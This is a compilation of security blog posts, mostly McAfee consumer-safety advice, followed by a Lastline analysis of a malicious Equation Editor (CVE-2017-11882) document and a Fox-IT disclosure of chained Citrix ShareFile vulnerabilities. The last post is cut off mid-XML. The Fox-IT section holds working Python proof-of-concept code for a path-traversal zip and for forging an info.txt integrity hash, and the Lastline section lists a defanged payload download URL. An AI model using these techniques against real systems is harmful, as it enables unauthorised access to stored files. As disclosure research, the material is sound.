  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

“Grand Theft Auto V” Hack: How to Defeat the Online Gaming Bug

Over the past two decades, we’ve seen a huge rise in the popularity of online gaming among both children and adults. One particular game that has experienced huge success is “Grand Theft Auto,” or GTA, which has been developed and produced by Rockstar Games. The most recent edition of the game, “Grand Theft Auto V,” hit $6 billion in sales as of April 2018, creating a record-breaking impact in the gaming industry. However, the game’s massive success doesn’t mean it’s immune to cyberattacks. A recent vulnerability in “Grand Theft Auto V” allowed malicious trolls to take over users’ games who were entering into single-player mode. By leveraging the flaw, these hackers were not only able to kick gamers off of their single-player session but could also continually kill their avatar.

So how exactly did these trolls carry out these attacks? Beginning last week, reports began to circulate that one popular ‘mod menu,’ or a series of alterations sought out and installed by players, was all the sudden advertising the ability to discover an online player’s Rockstar ID – a problem potentially originating from a bug found in the game’s most recent update. Taking advantage of this opportunity, hackers gained access to users’ Rockstar IDs and took control of their single-player games. Soon enough, legitimate players’ games were hijacked and sabotaged.

It is unclear as to whether this vulnerability came out of Rockstar’s most recent update or if this hack has been around for years and just now found its way to public PC mod menus. Either way, it sheds light on how persistent cyberthreats are in the world of online gaming – even impacting some of the most popular video games out there, such as “Grand Theft Auto V.”

Fortunately, reports are already circulating the bug was quietly patched over the weekend (despite confirmation from the game’s developer) – so to protect against the hack, all users should update their game as soon as possible. However, that doesn’t mean there still aren’t some steps these gamers can take to protect themselves from future hacks and vulnerabilities. Check out the following tips:

  • Limit the personal info on your online profile. Gamers are required to create a user profile in order to access the appropriate console/computer network. When creating your profile, avoid displaying your personal information that could potentially be used against you by hackers, such as your name, address, date of birth, and email address.
  • Create a unique and complex password for your online profile. The more complex the password, the more difficult it will be for a hacker to access your personal information. And, of course, make sure you don’t share your password with other users.
  • Be careful who you chat with. Online games will usually have a built-in messenger service that allows players to contact each other. It’s important to be aware of the risks associated with chatting to strangers. If you choose to use the chat feature in your online game, never give out your account details and avoid opening messages with attached files or links.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post “Grand Theft Auto V” Hack: How to Defeat the Online Gaming Bug appeared first on McAfee Blogs.

Have You Talked to Your Kids About a Career in Cybersecurity?

career in cybersecurityHere’s some cool trivia for you: What profession currently has a zero-percent unemployment rate, pays an average of $116,000 a year, and is among the top in-demand jobs in the world? A lawyer? A pharmacist? A finance manager, perhaps?

Nope. The job we’re talking about is a cybersecurity specialist and, because of the increase in cyber attacks around the world, these professionals are highly employable.

Job Security

According to numbers from the Bureau of Labor and Statistics, a career in cybersecurity is one of the most in-demand, high-paying professions today with an average salary of $116,000, or approximately $55.77 per hour. That’s nearly three times the national median income for full-time wage and salary workers. How’s that for job security?

Why is the demand so high? Sadly, because there are a lot of black hats (bad guys) out there who want our data — our user IDs, passwords, social security numbers, and credit card numbers. Every month it seems banks, hospitals, and major corporations are reporting security breaches, which has put the global cybersecurity talent an estimated deficit of two million professionals.career in cybersecurity

It’s exciting to see gifts and passions emerge in our kids as they grow and mature. If a child is good at math and sciences, we might point them toward some the medical field. If they a child shows an affinity in English and communication skills, maybe a law, teaching, or media career is in their future.

But what about a cybersecurity expert? Have you noticed any of these skills in your kids?

Cybersecurity skills/traits:

Problem-solving
Critical thinking
Flexible/creative problem solving
Collaborative, team player
Continual learner
Gaming fan
A sense of duty, justice
Persistent, determined
Works well under pressure
Curious and perceptive
Technology/tech trend fan
Verbal and written communications

Education

Most jobs in cybersecurity require a four-year bachelor’s degree in cybersecurity or a related field such as information technology or computer science. Students take coursework in programming and statistics, ethics, and computer forensics, among other courses.

Conversation Starters

First, if your child has some of the skills/personality traits mentioned, how do you start directing him or her toward this field? The first place to begin is in the home. Model smart cybersecurity habits. Talk about digital safety, the importance of protecting personal data and the trends in cybercrimes. In short, model and encourage solid digital citizenship and family security practices. career in cybersecurity

Second, bring up the possibility, or plant the seed. Be sure to encourage both boys and girls equally. Help your child find answers to his or her questions about careers in computer and data science, threat research, engineering and information on jobs such as cybersecurity analyst, vulnerability analyst, and penetration tester.

Third, read and share takeaways from the Winning The Game a McAfee report that investigates the key challenges facing the IT Security industry and the possible teen gaming link to a successful cybersecurity career.

Additional resources*

CyberCompEx. A connection point for everything cybersecurity including forums, groups, news, jobs, and competition information.

CyberCorps® Scholarship for Service. SFS is a program providing scholarships and stipends to undergraduate and graduate students studying cybersecurity at participating institutions. Great for those who want to work in government.

CyberPatriot. This site is created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM).

GenCyber. This is a summer cybersecurity camp for K-12 students and teachers that focuses on inspiring kids to direct their talents toward cybersecurity skills and closing the security skills gap.

career in cybersecurityNational CyberWatch Center. The National CyberWatch Center is a consortium of higher education institutions, public and private businesses, and government agencies focused on advancing cybersecurity education and strengthening the workforce.

National Initiative for Cybersecurity Careers and Studies. NICCS provides information on cybersecurity training, formal education, and workforce development.

National Initiative for Cybersecurity Education. NICE is an initiative to energize and promote a robust network and an ecosystem of cybersecurity education, cybersecurity careers, training, and workforce development.

*Resource list courtesy of Stay Safe Online.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post Have You Talked to Your Kids About a Career in Cybersecurity? appeared first on McAfee Blogs.

The VORACLE OpenVPN Attack: What You Need to Know

Many of us know that using a VPN (Virtual Private Network) adds an extra layer of security to our Wi-Fi networks. But VORACLE, a recently discovered vulnerability that was announced at a security conference by security researcher Ahamad Nafeez, is making some people reconsider this this steadfast safety tip. Let’s look under the hood at this vulnerability to understand what was impacted and why, and what we should do in the future when it comes to safely connecting to Wi-Fi.

Under the Hood of a VPN

A VPN is a connection between a secure server and your mobile device or computer. Through the VPN your activity and information on the internet is encrypted, making it difficult for anyone else to see your private information. Many of us use a VPN for work when we travel, some of us use them to watch videos online, and more and more of us use them as a best practice to help keep our information safe any time we want to use a Wi-Fi connection that we’re not sure about.

About the VORACLE VPN Vulnerability

At a high level, VORACLE leverages a vulnerability found in the open-source OpenVPN protocol. OpenVPN is an open-source protocol used by the majority of VPN providers, meaning many VPN products are affected.

The VORACLE attack can recover HTTP traffic sent via encrypted VPN connections under certain conditions, the first being that the VPN app in use enables compression via the OpenVPN protocol. A  hacker must be on the same network and able to lure you to an HTTP (not HTTPS) site with malicious code through phishing or a similar other tactic. The attack can happen on all web browsers but Google Chrome, due to the way in which HTTP requests are made.

Luckily the McAfee Safe Connect VPN was not built on the vulnerable OpenVPN code. That said, I want to take this opportunity to remind you of something we talk about a lot in the security industry: relying on only one layer of security is simply not enough today. Here are some tips and best practices to stay safe.

  • Set up multi-factor authentication whenever possible. This tip is especially important for valuable accounts like email or social media, which might be connected to financial information. With multi-factor authentication in place, you’ll be better protected by combining your usual login information with another layer of protection, such as a one-time-password sent to your phone, bio metrics (say, a thumb print), or a security token that you’ll need to confirm before getting access to your account.
  • Use secure websites (HTTPS) whenever possible. The ‘S’ at the end of HTTPS stands for ‘Secure’. It means all communications between your browser and the website are encrypted. Most websites are moving toward this standard practice, so if you notice yourself landing on a website with just HTTP, stay alert.
  • Avoid making financial transactions until you’re on a network you trust. Sharing personal data like your credit card information can lead to unnecessary vulnerabilities. The best bet is to wait until you’re on your home network with additional layers of security such as McAfee’s Secure Home Platform already in place.
  • Consider using your mobile network and being your own hotspot. If your mobile or IoT data plan includes a hot spot, consider using that over Wi-Fi to avoid some of the challenges that come with it in the first place.
  • Do continue to use a personal VPN when you’re on the go and using Wi-Fi– just be sure to do so while having an additional layer of security in place so that if a similar vulnerability is discovered, you’ll already have a backup.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post The VORACLE OpenVPN Attack: What You Need to Know appeared first on McAfee Blogs.

#CyberAware: Teaching Kids to Get Fierce About Protecting Their Identity

Identity ProtectionIt wasn’t Kiley’s fault, but that didn’t change the facts: The lending group denied her college loan due to poor credit, and she didn’t have a plan B. Shocked and numb, she began to dig a little deeper. She discovered that someone had racked up three hefty credit card bills using her Social Security Number (SSN) a few years earlier.

Her parents had a medical crisis and were unable to help with tuition, and Kiley’s scholarships didn’t cover the full tuition. With just months left before leaving to begin her freshman year at school, Kiley was forced to radically adjusted her plans. She enrolled in the community college near home and spent her freshman year learning more than she ever imagined about identity protection and theft.

The Toll: Financial & Emotional

Unfortunately, these horror stories of childhood identity theft are all too real. According to Javelin Strategy & Research, more than 1 million children were the victim of identity fraud in 2017, resulting in losses of $2.6 billion and more than $540 million in out-of-pocket costs to the families.

The financial numbers don’t begin to reflect the emotional cost victims of identity theft often feel. According to the 2017 Identity Theft Aftermath report released by the Identity Theft Resource Center, victims report feeling rage, severe distress, angry, frustrated, paranoid, vulnerable, fearful, and — in 7% of the cases — even suicidal.

Wanted: Your Child’s SSNIdentity Protection

Sadly, because of their clean credit history, cyber crooks love to target kids. Also, identity theft among kids often goes undiscovered for more extended periods of time. Thieves have been known to use a child’s identity to apply for government benefits, open bank or credit card accounts, apply for a loan or utility service, or rent a place to live. Often, until the child grows up and applies for a car or student loan, the theft goes undetected.

Where do hackers get the SSN’s? Data breaches can occur at schools, pediatrician offices, banks, and home robberies. A growing area of concern involves medical identity theft, which gives thieves the ability to access prescription drugs and even expensive medical treatments using someone else’s identity.

6 Ways to Build #CyberAware Kids

  1. Talk, act, repeat. Identity theft isn’t a big deal until it personally affects you or your family only, then, it’s too late. Discuss identity theft with your kids and the fallout. But don’t just talk — put protections in place. Remind your child (again) to keep personal information private. (Yes, this habit includes keeping passwords and personal data private even from BFFs!)
  2.  Encourage kids to be digitally savvy. Help your child understand the tricks hackers play to steal the identities of innocent people. Identity thieves will befriend children online and with the goal of gathering personal that information to steal their identity. Thieves are skilled at trolling social networks looking at user profiles for birth dates, addresses, and names of family members to piece together the identity puzzle. Challenge your kids to be on the hunt for imposters and catfishes. Teach them to be suspicious about links, emails, texts, pop up screens, and direct messages from “cute” but unknown peers on their social media accounts. Teach them to go with their instincts and examine websites, social accounts, and special shopping offers.Identity Protection
  3. Get fierce about data protection. Don’t be quick to share your child’s SSN or secondary information such as date of birth, address, and mothers’ maiden name and teach your kids to do the same. Also, never carry your child’s (or your) physical Social Security card in your wallet or purse. Keep it in a safe place, preferably under lock and key. Only share your child’s data when necessary (school registration, passport application, education savings plan, etc.) and only with trusted individuals.
  4. File a proactive fraud alert. By submitting a fraud alert in your child’s name with the credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s social security number.
  5. Know the warning signs. If a someone is using your child’s data, you may notice: 1) Pre-approved credit card offers addressed to them arriving via mail 2) Collection agencies calling and asking to speak to your child 3) Court notices regarding delinquent bills. If any of these things happen your first step is to call and freeze their credit with the three credit reporting agencies: Equifax, Experian, and TransUnion.
  6. Report theft. If you find a violation of your child’s credit of any kind go to  IdentityTheft.gov to report the crime and begin the restoring your child’s credit. This site is easy to navigate and takes you step-by-step down the path of restoring stolen credit.

Building digitally resilient kids is one of the primary tasks of parents today. Part of that resilience is taking the time to talk about this new, digital frontier that is powerful but has a lot of security cracks in it that can negatively impact your family. Getting fierce about identity protection can save your child (and you) hours and even years of heartache and financial loss.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post #CyberAware: Teaching Kids to Get Fierce About Protecting Their Identity appeared first on McAfee Blogs.

Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What spiked the movement, starting in fall 2017, toward cryptojacking? The first reason is the value of cryptocurrency. If attacker can steal Bitcoins, for example, from a victim’s system, that’s enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems. There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords wipe away this view. If an attacker can hijack enough systems, mining in high volume can be profitable. Not only individuals struggle with protecting against these attacks; companies suffer from them as well.

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to create the right amount of security controls. We have seen breaches in which bad actors uploaded their own containers and added them to a company’s cloud environment—which started to mine cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

Evading Static Analyzers by Solving the Equation (Editor)

Introduction

As part of our efforts to self-evaluate our backend systems, we closely monitor the behavioral reports produced by our dynamic analysis system. Every detection is, in fact, cross-checked and correlated with several other pieces of information, including the output from a number of static analyzers.

A few weeks ago a small anomaly started to creep in when analyzing malicious documents: executions spawning a rogue Equation Editor process (often linked to arbitrary code executions) were no longer triggering our internal static analyzers. It was as if the malicious documents were leveraging a new CVE, possibly just added to a well-maintained document exploit builder (for instance like the old Phantom exploit builder kit, or the Metasploit framework).

One of the malicious documents (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a) was obfuscated but the process snapshot was still clearly showing the exploitation of the same buffer overflow used by CVE-2017-11882. However, the header of the OLE object (as extracted by rtfobj) was clearly different.

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882 and cf63479cefc4984309e97ed71e34a078cbf21d6a.

This quickly explained why the static analyzer didn’t assert detection of the known CVE: any string that is often used to detect CVE-2017-11882 relies on either the class name or some other byte sequence that, as shown in Figure 1, is now clearly missing. At this point, we decided to analyze the document in more detail.

OLE Object Analysis

The OLE object (as extracted by RTFScan and viewed by SS viewer) clearly shows that even its stream type is somewhat generic (normally an Equation Editor OLE object contains an
EquationNative
stream as further explained here). Instead, the OLE stream is parsed as a more obscure  Ole10Native (see Figure 2).

Figure 2: An OLE object featuring an Ole10Native stream.

Figure 2: An OLE object featuring an Ole10Native stream.

There are two interesting things happening here: (i) Equation Editor is still invoked to process the OLE object regardless of the OLE format, and (ii) Equation Editor is able to parse this new and generic format. As we show in Figure 3, the first is achieved because the CLSID is also specified inside the OLE object itself (the reader can find a nice walk through on how this is done here).

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

As for the stream itself, its type is not something we see every day. Equation Editor, on the other hand, seems to know this format quite well, and in fact it parses the object without raising any issue: it selectively reads and tests specific bytes (the first and third byte of the MTEF header and the first two of the TYPESIZE header), and if some specific values are found (as shown in Figure 4), Equation Editor is finally convinced to parse the FONT record as well, triggering once again the same buffer overflow that is normally exploited in CVE-2017-11882.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

Shellcode Analysis

The vulnerability exploited to execute the shellcode is indeed CVE-2017-11882; as soon as the FONT record is parsed, the control flow is transferred to 0x445203.

font record

At this address, a RET instruction will be executed to transfer control to the shellcode stored in a buffer located in lieu of the FONT record (this exact method of executing a shellcode is also used by CVE-2017-0802 and further explained here):

Figure 5: Shellcode stored as FONT name inside the FONT record.

Figure 5: Shellcode stored as FONT name inside the FONT record.

The shellcode also is using an interesting way to find itself in memory. Unlike other malicious documents exploiting CVE-2017-11882, in our case, the sample does not rely on the
WinExecute
API to divert execution. Rather, it searches the OLE stream itself to locate the entry point of the shellcode. To succeed, it needs the following three hardcoded values:

  • Address 0x0045BD3C: this address references an object that contains a pointer to another temporary structure (see Table 3 in Appendix for more details). This temporary structure points to the beginning Ole10Native stream as loaded in memory.
  • Address 0x004667B0: this address points to the imported function GlobalLock.
  • 0x11F: the entry point in the shellcode from where it will start executing.

These three values are then used as follows:

  1. First, the shellcode retrieves the handle of the memory object from 0x0045BD3C.
  2. Then the handle so retrieved is passed as parameter and used to invoke the GlobalLock API.
  3. The pointer returned references the first byte of the OLE stream in memory. The shellcode now knows where it is residing in the memory and starts executing from StartOfShellcode+0x11F.

The sample goes on by downloading a file from hxxp://b.reich[.]io/hnepyp.scr, saving it on disk as name.exe, and executing it. In this report, we omit the analysis of this specific binary, as it is yet another pony variant. Were the reader interested, VirusTotal has a full report here (sha1: 2bcd81a9f077ff3500de9a80b469d34a53d51f4a); all IOCs are also listed in the Appendix, Table 1.

Why Static Analysis is not Enough

While in some cases static analysis can detect if a specific vulnerability is exploited, obfuscated samples often present quite a challenge even for the most sophisticated analyzer. In our case, a simple pattern match is not even possible: the only bits of information we can use to write a detection rule is the CLSID and the 5 bytes that are constant in the MathType OLE object (the OLE object used by Equation Editor).

A hypothetical static checker would need to:

  1. Extract the OLE object from the document
  2. Parse the OLE header and check if it is pointing to the Equation Editor CLSID
  3. Extract the Ole10Native stream
  4. Parse it and get the FONT record
  5. Check its actual length
  6. And finally, verify that the last four bytes of the buffer corresponds to an address

This is not a trivial task if done statically, and overall impossible if only pattern matching is available (as it is the case if we are using YARA rules, for example). On the other hand, in Figure 6 we can see the full behavioral analysis when analyzing the sample dynamically.

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).

Conclusions

The sample subject of our analysis did not use any new CVEs, but relied on an unexpected new way to deliver the old and well-known CVE-2017-11882. This particular way of delivering the exploit effectively evaded all static analyzers relying on OLE’s static information. As the exploit author managed to remove (intentionally?) all non-binary strings from the exploit data, he considerably raised the bar for a static analyzer to detect this specific exploit.

Having said that, Microsoft has already issued advisory addressing this specific CVE, so previous mitigations are effective and still apply:

In conclusion, we verified whether MathType v7 (the successor of Equation Editor) was vulnerable to this specific parsing quirk when opening a Ole10Native stream,  but we are glad to report that both mitigations DEP and ASLR are enabled, thereby protecting the binary from the aforementioned vulnerabilities.

Appendix

Indicator Of Compromise Description
cf63479cefc4984309e97ed71e34a078cbf21d6a SHA1 malicious document
2bcd81a9f077ff3500de9a80b469d34a53d51f4a SHA1 loki payload
hxxp://b.reich[.]io/hnepyp.scr URL loki payload

Table 1: IoCs discussed in the blogpost.

Offset Size (bytes) Description Value Comment
0 1 MTEF Version 0x2 Version 2
1 1 Generating Platform 0x8 Garbage
2 1 Generating Product 0x1 1 for Equation Editor
3 1 Product Version 0xB9 Garbage
4 1 Product Subversion 0xC9 Garbage

Table 2: Ole10Native MTEF header.

Offset Size (bytes) Description
0x0 4 Handle to the memory object storing the Ole10Native stream in memory
0x4 4 Size in memory
0x8 4 Size in memory
0x10 4 Index of the byte which will be read next from the stream
0x14 4 Unknown

Table 3: Temporary Structure Format.

The post Evading Static Analyzers by Solving the Equation (Editor) appeared first on Lastline.

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to (from the internet) access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).

Sharefile

Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at name.sharefile.eu (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called out.zip, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:

Info.txt

In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr = infile.read().strip().split('|')
instr2 = u'|'.join(instr[:-1])
outhash = md5.new(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<!--?xml version="1.0" encoding="utf-8"?--><!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<DownloadTokenID>dt6bbd1e278a634e1bbde9b94ff8460b24</DownloadTokenID>
<RequestType>single</RequestType>
<BaseUrl>https://redacted.sf-api.eu/</BaseUrl>
<ErrorUrl>https://redacted.sf-api.eu//error.aspx?type=storagecenter-downloadprep</ErrorUrl>
<StorageBasePath>\\s3\sf-eu-1\;</StorageBasePath>
<BatchID>dt6bbd1e278a634e1bbde9b94ff8460b24</BatchID>
<ZipFileName>tfile</ZipFileName>
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Metadata>
<Item key="operatingsystem" value="Linux" />
</Metadata>
<IrmEnabled>false</IrmEnabled>
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<Items>
